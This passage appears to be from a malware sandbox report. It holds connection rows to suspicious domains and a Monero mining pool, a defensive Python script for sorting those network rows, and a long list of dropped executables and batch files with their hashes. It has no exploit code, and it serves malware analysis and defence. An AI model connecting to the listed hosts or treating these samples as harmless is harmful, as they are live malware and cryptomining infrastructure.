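US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
"""


def parse_row(line):
    """'Country Destination [Domain] Proto' -> dict.  A missing Domain cell or
    a '-' placeholder both become the empty string."""
    tok = line.split()
    if len(tok) not in (3, 4):
        raise ValueError(f"unexpected row: {line!r}")
    ip, port = tok[1].rsplit(":", 1)
    domain = tok[2] if len(tok) == 4 and tok[2] != "-" else ""
    return {"country": tok[0], "ip": ip, "port": int(port),
            "domain": domain, "proto": tok[-1]}


def ptr_to_ip(name):
    """'29.68.91.77.in-addr.arpa' -> '77.91.68.29'; None if not a PTR name."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[:-len(suffix)].split(".")
    try:
        return str(ipaddress.ip_address(".".join(reversed(octets))))
    except ValueError:
        return None


def triage(text):
    """Separate real peers from resolver chatter and PTR noise."""
    rows = [parse_row(l) for l in text.splitlines() if l.strip()]
    is_dns = lambda r: f"{r['ip']}:{r['port']}" == RESOLVER
    # A named row for an IP lends its domain to the unnamed rows for that IP.
    domain_for_ip = {r["ip"]: r["domain"] for r in rows
                     if r["domain"] and not is_dns(r)}
    lookups, ptr_ips, peers = [], set(), Counter()
    for r in rows:
        if is_dns(r):
            ip = ptr_to_ip(r["domain"])
            if ip:
                ptr_ips.add(ip)          # reverse lookup of a peer address
            elif r["domain"]:
                lookups.append(r["domain"])
            continue
        if ipaddress.ip_address(r["ip"]).is_multicast:
            continue                     # mDNS on 224.0.0.251, not a peer
        key = (r["ip"], r["port"], r["proto"], domain_for_ip.get(r["ip"], ""))
        peers[key] += 1
    peer_ips = {k[0] for k in peers}
    peer_domains = {k[3] for k in peers if k[3]}
    return {
        "peers": dict(peers),
        # queried but never connected to: dead, sinkholed, or not yet used
        "lookups_without_connection": [d for d in dict.fromkeys(lookups)
                                       if d not in peer_domains],
        # reverse-resolved but absent from the connection rows given
        "ptr_without_connection": sorted(ptr_ips - peer_ips),
    }


def nonstandard_ports(result, usual=(80, 443)):
    """Peers on ports other than plain HTTP/HTTPS: first candidates for an
    IOC list, since they are not hidden behind shared CDN front ends."""
    return sorted({(ip, port) for ip, port, _, _ in result["peers"]
                   if port not in usual})
```

On the copied rows it yields seven distinct peers, reports `host-file-host6.com` as queried but never contacted, and puts `77.91.124.55:19071`, `95.217.246.182:8443` and `212.47.253.124:14433` (`xmr-eu1.nanopool.org`, a mining-pool hostname) on the non-standard-port list. The `172.67.212.39` and `104.20.68.143` peers are Cloudflare-fronted, so the hostname, not the IP, is the durable indicator there.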

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe

MD5 a42bb483360857d54a8187b28fd726a3
SHA1 98f94fda7cf8aa042c1f3645a5bde7fa3c0080e5
SHA256 6446edc0dd30404b8fedcb11b83fe99f66ed6935dad65dbc9cb40314427f256d
SHA512 5395266a85f1be8b94763e2d860c2a7ff0e43dbf460876f40a9c26522600f1b07a2899d05e264fa2bf527b5c80b27edce6e67db0fd3fc1fa75f073995e36e118

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe

MD5 a31db6bfd8052c52507eb4c9353db812
SHA1 821f77171504f836fb3cecd0d253f0303d62b97e
SHA256 7346af4288b20934de0fde6d9d4a097f8a8d72e518ad818e2aca824de25b29b2
SHA512 c7b4f53e063023bd0ed020244bc9d58f1575c4b603ff40d6da4d89d83fe43e743d6ef04a0c5b5d09757ac8aa6c697d745d520b062674173ccd69d0393eca38b1

memory/3076-14-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3076-15-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe

MD5 911f0c548f884b7d732aafbe4f893d3e
SHA1 2e83d3c51eef161ec4ab5148befb375d1c141b3d
SHA256 44aacd891b1eb9fac0e76e03a71efbf4abea4bcef17307daf7098973e0769f7b
SHA512 120aebeed5e3a8c2bf546c1107e32534ba6f14fc4906b8c793da0d5059b6c339d8e3956aabe5a11258e09b749dfa5aaaa9e05021b35e71b7c307519177d6be2f

memory/2772-19-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2772-21-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2772-23-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2772-20-0x0000000000400000-0x0000000000428000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe

MD5 24d3340af1225323351bbdb0107583cd
SHA1 c7f3902121771a66b0fe6e5f37e5887b4ff8d7ac
SHA256 2c032f675f3f8a8645c09e3f84e2d6c8d893bd962aef5785999107d624bf1f93
SHA512 c73121a5ae9a31b208cce765f9b5f86f1f63525339bd1dfb5d4bbaf3e5ead2fca0301ef80a8d559eb0e87083fc267ad4de9fb06cdb796fa07c0720fe4719427a

memory/2608-27-0x00000000031D0000-0x00000000031E6000-memory.dmp

memory/3076-28-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2A18.exe

MD5 f6d480ab491757c15f2ec4b93d58c316
SHA1 6c4c1880cb5be4518bb45e99948c0c983c76d7bd
SHA256 80f237543360f5ebf130bcbf4609972bbcbaec9866150ffb061ae63750967f5c
SHA512 f5b9c532572a6631695e887eebcccfd049befc5ab83fcfe8047a337ce026949161b49931ba939b34080873e8ae510a8c637a1002ce6a714fa5e38d8e2f51e107

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe

MD5 167550480f34b0fd3b23b51ba5bf68b1
SHA1 f2b2c45b43c02ef464322d922f89bca62491ae2d
SHA256 119c11bb68dba62db360a1049450734fd9bc5764f7de25e20c89905123d5b2d5
SHA512 9b55c994f1d41ac88769830310f51c2f2600851ece76f041f259ced01245334e6f45cb9116c4ad36248a4968ed1a5c3086f1eb8bb9dc78dcfb72e78c09a0fce9

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe

MD5 167550480f34b0fd3b23b51ba5bf68b1
SHA1 f2b2c45b43c02ef464322d922f89bca62491ae2d
SHA256 119c11bb68dba62db360a1049450734fd9bc5764f7de25e20c89905123d5b2d5
SHA512 9b55c994f1d41ac88769830310f51c2f2600851ece76f041f259ced01245334e6f45cb9116c4ad36248a4968ed1a5c3086f1eb8bb9dc78dcfb72e78c09a0fce9

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe

MD5 a4306d806c89498ed625a549afc5b502
SHA1 9e3a1872d54e3a273bcf6183f9d6f670add6cc24
SHA256 a0e59c53ba9e74580081f1c52a9650d69f83b69ecbed96b90eccb77ab6802bdb
SHA512 092f965d639fbfa17bcc7c71182ca63a84fc93802aae37b7ee9452782597c6f9a8e62860563fb0b38f95214b8b4eb6094197bd52704d3d222948fa09c874bf7f

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe

MD5 a4306d806c89498ed625a549afc5b502
SHA1 9e3a1872d54e3a273bcf6183f9d6f670add6cc24
SHA256 a0e59c53ba9e74580081f1c52a9650d69f83b69ecbed96b90eccb77ab6802bdb
SHA512 092f965d639fbfa17bcc7c71182ca63a84fc93802aae37b7ee9452782597c6f9a8e62860563fb0b38f95214b8b4eb6094197bd52704d3d222948fa09c874bf7f

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe

MD5 a5f8777827db9a91919aa3a907f1688c
SHA1 6bccb9f9d23921d606c245e33c5c9b2a417102f6
SHA256 9b7fcc00eef2766f0e0240e746f669a7ec683a5189adf2992eb72c6a7c6b63e9
SHA512 28a85196eddec2720861fbd6cd194e4d3d907cd7c14cbdbd1f9338aff69388bbce102c8abd58a214350ae5b05b721c436689eeef94b3aa1547baa378c5a1df2b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe

MD5 a5f8777827db9a91919aa3a907f1688c
SHA1 6bccb9f9d23921d606c245e33c5c9b2a417102f6
SHA256 9b7fcc00eef2766f0e0240e746f669a7ec683a5189adf2992eb72c6a7c6b63e9
SHA512 28a85196eddec2720861fbd6cd194e4d3d907cd7c14cbdbd1f9338aff69388bbce102c8abd58a214350ae5b05b721c436689eeef94b3aa1547baa378c5a1df2b

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe

MD5 e2161ba5d2b2f09cea9483b8c7fa65ca
SHA1 7c49ad5c2ac5e155b0abbba7d5a96b332296d59f
SHA256 ef5f2c9459023d57966e65202caacce1b4e65af5947f7c7d8dfd165ca4b94b2a
SHA512 f259eb8300ac25fa60a5bbd87ea02096654a86640f26b974d021d7264c057fa476d6d44e9074e4df71a7a85357c3c677b6734715a0d0ef95049b2e067f80adbb

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe

MD5 e2161ba5d2b2f09cea9483b8c7fa65ca
SHA1 7c49ad5c2ac5e155b0abbba7d5a96b332296d59f
SHA256 ef5f2c9459023d57966e65202caacce1b4e65af5947f7c7d8dfd165ca4b94b2a
SHA512 f259eb8300ac25fa60a5bbd87ea02096654a86640f26b974d021d7264c057fa476d6d44e9074e4df71a7a85357c3c677b6734715a0d0ef95049b2e067f80adbb

C:\Users\Admin\AppData\Local\Temp\2CD8.exe

MD5 8a666daa94ae0b5281e3d36ee8ccc2dd
SHA1 af76d26dfd6abeca53e5bffcd52d50ebb0b0fac1
SHA256 9461034b42d5e15f4904f19f789dcace99bc7856e0f11e359e37e89abd1f7d4f
SHA512 789b6e786817d27a39153b9de019beb3b53219c77056e68ae279adaa0890664895db8c2f369686291b5addc90cf803a2a30788ffc7d7b1cf34b4c19bfb4ad82b

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe

MD5 f1432a4597fa0744d496cbe8ebd50fd5
SHA1 99e96566aaee582913978531396110bc171101e5
SHA256 85f10bec21a78984acfed0f51a06e75b597b8a880f98e6e76af1438b3f5eef5f
SHA512 d6aed590959077a9fd5299a19ce3538cf943e8da260972d83f471b76e0a98b8570587171abc20fac7acddc44278be2248e9a79ec81435d03105b5949111ff438

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe

MD5 f1432a4597fa0744d496cbe8ebd50fd5
SHA1 99e96566aaee582913978531396110bc171101e5
SHA256 85f10bec21a78984acfed0f51a06e75b597b8a880f98e6e76af1438b3f5eef5f
SHA512 d6aed590959077a9fd5299a19ce3538cf943e8da260972d83f471b76e0a98b8570587171abc20fac7acddc44278be2248e9a79ec81435d03105b5949111ff438

C:\Users\Admin\AppData\Local\Temp\2CD8.exe

MD5 8a666daa94ae0b5281e3d36ee8ccc2dd
SHA1 af76d26dfd6abeca53e5bffcd52d50ebb0b0fac1
SHA256 9461034b42d5e15f4904f19f789dcace99bc7856e0f11e359e37e89abd1f7d4f
SHA512 789b6e786817d27a39153b9de019beb3b53219c77056e68ae279adaa0890664895db8c2f369686291b5addc90cf803a2a30788ffc7d7b1cf34b4c19bfb4ad82b

C:\Users\Admin\AppData\Local\Temp\2DE3.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\2DE3.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\2DE3.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

memory/4948-83-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3504-87-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4948-88-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\30C2.exe

MD5 6413b4ae9e37c89aaa4e17b1bd0b1070
SHA1 bbe5992bfa8cdf5268fdcf29bd4529d8628d3e69
SHA256 68f35928de6711cc7ef4c13a4b9af2975221145bcfa54feb5d28a344ff88f1b1
SHA512 766af5050207e85020c8796c265ac3472dfcdfda1a9da82d6f991766de5bcb38b20f11e1dc8faa1838713027a51145d7fbc8615385071ace9c5130c08279eceb

C:\Users\Admin\AppData\Local\Temp\30C2.exe

MD5 6413b4ae9e37c89aaa4e17b1bd0b1070
SHA1 bbe5992bfa8cdf5268fdcf29bd4529d8628d3e69
SHA256 68f35928de6711cc7ef4c13a4b9af2975221145bcfa54feb5d28a344ff88f1b1
SHA512 766af5050207e85020c8796c265ac3472dfcdfda1a9da82d6f991766de5bcb38b20f11e1dc8faa1838713027a51145d7fbc8615385071ace9c5130c08279eceb

memory/3504-91-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4948-90-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4948-86-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3504-85-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2756-97-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3160.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\3160.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

memory/4192-102-0x00007FF8DA2B0000-0x00007FF8DAD71000-memory.dmp

memory/4192-101-0x0000000000B70000-0x0000000000B7A000-memory.dmp

memory/3504-103-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2756-106-0x0000000072A80000-0x0000000073230000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\37C9.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\37C9.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/2756-119-0x0000000007E30000-0x00000000083D4000-memory.dmp

memory/2756-120-0x0000000007960000-0x00000000079F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\2EBC.tmp\2EBD.tmp\2EBE.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe

MD5 3a6f40ba3aee11d69dbe05fc97790bbc
SHA1 6b29b15bf109dab84dd1174004fce3b16a7fff4f
SHA256 80cebf682f46f4a3ec445b8ff867b6a89a83ebcdeb81a81dd30d050324af7e98
SHA512 1c511d0740564ec90ada01636fe6c1c0c49b9150d95cb2858e92267f0b9e3bb5459fb8ac0e971a62847ab526da5ff6635d8063dd1dafc32d53cfc4368fc990c2

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe

MD5 3a6f40ba3aee11d69dbe05fc97790bbc
SHA1 6b29b15bf109dab84dd1174004fce3b16a7fff4f
SHA256 80cebf682f46f4a3ec445b8ff867b6a89a83ebcdeb81a81dd30d050324af7e98
SHA512 1c511d0740564ec90ada01636fe6c1c0c49b9150d95cb2858e92267f0b9e3bb5459fb8ac0e971a62847ab526da5ff6635d8063dd1dafc32d53cfc4368fc990c2

memory/1452-124-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/1452-125-0x0000000000B10000-0x0000000000B4E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 45fe8440c5d976b902cfc89fb780a578
SHA1 5696962f2d0e89d4c561acd58483b0a4ffeab800
SHA256 f620e0b35ac0ead6ed51984859edc75f7d4921aaa90d829bb9ad362d15504f96
SHA512 efe817ea03c203f8e63d7b50a965cb920fb4f128e72b458a7224c0c1373b31fae9eaa55a504290d2bc0cf55c96fd43f295f9aef6c2791a35fc4ab3e965f6ff25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

memory/2756-129-0x0000000007B10000-0x0000000007B20000-memory.dmp

memory/1452-136-0x0000000007990000-0x000000000799A000-memory.dmp

memory/1452-135-0x0000000007A10000-0x0000000007A20000-memory.dmp

memory/4192-137-0x00007FF8DA2B0000-0x00007FF8DAD71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

\??\pipe\LOCAL\crashpad_3924_OAMRKQCVPBEVJMGL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eb438bddcee1173dc85a462b960bbee1
SHA1 86a491f169b554d87acdd29bdb6c25088767a0ab
SHA256 7dd44e740e7973ff29155d99460c80495116dfb4e9fda4c789f6d318d6abc8b3
SHA512 f0d477b036fcb7d64a524e1a8f81e371c2a764e921b7353a5df28fcf79d725f85d2938692d396afb5ef3d114ba68523764bd20019ad7f6e7e396eb13605f3c3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2c4e64d73abbd8118cc77bdb4002177a
SHA1 3aa2727eafd13aa692b0e3273f2b40b6d03a88e8
SHA256 f7dbfe46935441be274b5a50bd1cfdf959910a596c7aa7592ba5aac3eea5294a
SHA512 29b4c8dd346b40c8f51f7445ab418d9f9787bae1a2206a1d584f09750c1aa02e101114a53c2348a8b0e71877c692d0e5dbd74dfab3a4d5670005d32e259825dc

memory/2756-187-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/2756-188-0x0000000008A00000-0x0000000009018000-memory.dmp

memory/2756-189-0x0000000007CC0000-0x0000000007DCA000-memory.dmp

memory/1452-195-0x0000000007A70000-0x0000000007A82000-memory.dmp

memory/2756-203-0x0000000007C50000-0x0000000007C8C000-memory.dmp

memory/1452-205-0x0000000007AA0000-0x0000000007AEC000-memory.dmp

memory/4192-213-0x00007FF8DA2B0000-0x00007FF8DAD71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6A06.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Temp\6A06.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

memory/1452-220-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/5540-222-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/5540-221-0x0000000000E60000-0x0000000001D8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/6072-258-0x0000000072A80000-0x0000000073230000-memory.dmp

memory/6072-260-0x0000000000780000-0x0000000000C96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/5540-261-0x0000000072A80000-0x0000000073230000-memory.dmp

